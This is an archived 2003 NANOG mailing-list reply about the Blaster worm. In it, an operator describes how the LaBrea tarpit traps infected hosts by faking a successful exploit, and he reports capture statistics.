[60698] in North American Network Operators' Group
Re: The impending DDoS storm
daemon@ATHENA.MIT.EDU (Jeff Kell)
Thu Aug 14 23:26:18 2003
Date: Thu, 14 Aug 2003 23:02:08 -0400
From: Jeff Kell <jeff-kell@utc.edu>
To: Dan Hollis <goemon@anime.net>
Cc: Jason Frisvold <friz@corp.ptd.net>,
Lloyd Taylor <ltaylor@keynote.com>, Jack Bates <jbates@brightok.net>,
nanog@merit.edu
In-Reply-To: <Pine.LNX.4.44.0308131120560.18194-100000@sasami.anime.net>
Errors-To: owner-nanog-outgoing@merit.edu
Dan Hollis wrote:
> On Wed, 13 Aug 2003, Jason Frisvold wrote:
>>If the blaster cannot get a proper DNS response, it continues to
>>replicate via port 135... It then goes into a retry cycle and continues
>>to try to get a good DNS lookup.
> has anyone tried tarpitting eg labrea to slow the worm?
Oh yeah, LaBrea sticks 'em *REAL* good...
> LaBrea::Tarpit SOURCE IP's
> 15223 total threads captured, from these 109 IP addresses
LaBrea makes it look like the exploit worked, and it hangs up the worm
trying to send the command to 4444. Thread counts get as high as 2546
(as of now) which is 10x the subnet block where the tarpit lives.
Had more like 30K threads until this morning when we had a power outage
that outlived my small UPS so the numbers above are since ~9:30 EST this
morning.
Jeff
